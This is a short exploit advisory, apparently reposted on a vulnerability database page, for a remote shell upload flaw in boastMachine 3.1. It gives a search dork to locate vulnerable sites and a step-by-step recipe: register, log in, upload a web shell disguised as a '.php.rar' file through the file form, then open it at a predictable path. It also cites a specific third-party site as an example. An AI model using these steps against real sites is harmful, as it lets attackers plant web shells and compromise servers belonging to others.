BoastMachine 3.1 remote shell upload

2010-01-26 / 2010-01-27
Credit: alnjm33
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Exploit Title : boastMachine v3.1 Remote File Upload Vulnerability Author: alnjm33 Software Link: http://boastology.com/pages/dload.php?id=bmachine-3.1.zip Software Link2:http://boastology.com/pages/dload.php?id=bmachine-3.1.rar Version: 3.1 Tested on: Version 3.1 My home : Sec-war.com<http://Sec-war.com> :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ==========================================Dork========================================== ( Powered by boastMachine v3.1 ) ================================Exploit============================================= First join in the Site /Server/path/register.php After that login in the Site /Server/path/login.php After Login go to this link /Server/path/bmc/files.php?form_id=new Now upload your shell like ( Shell.php.rar ) Now you can find your shell here /Server/path/files/username_Shell.php.rar e.g http://ldukestudio.com/hp_boastMachine/files/alnjm33_aasaa.php.rar ======================================================================================= Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top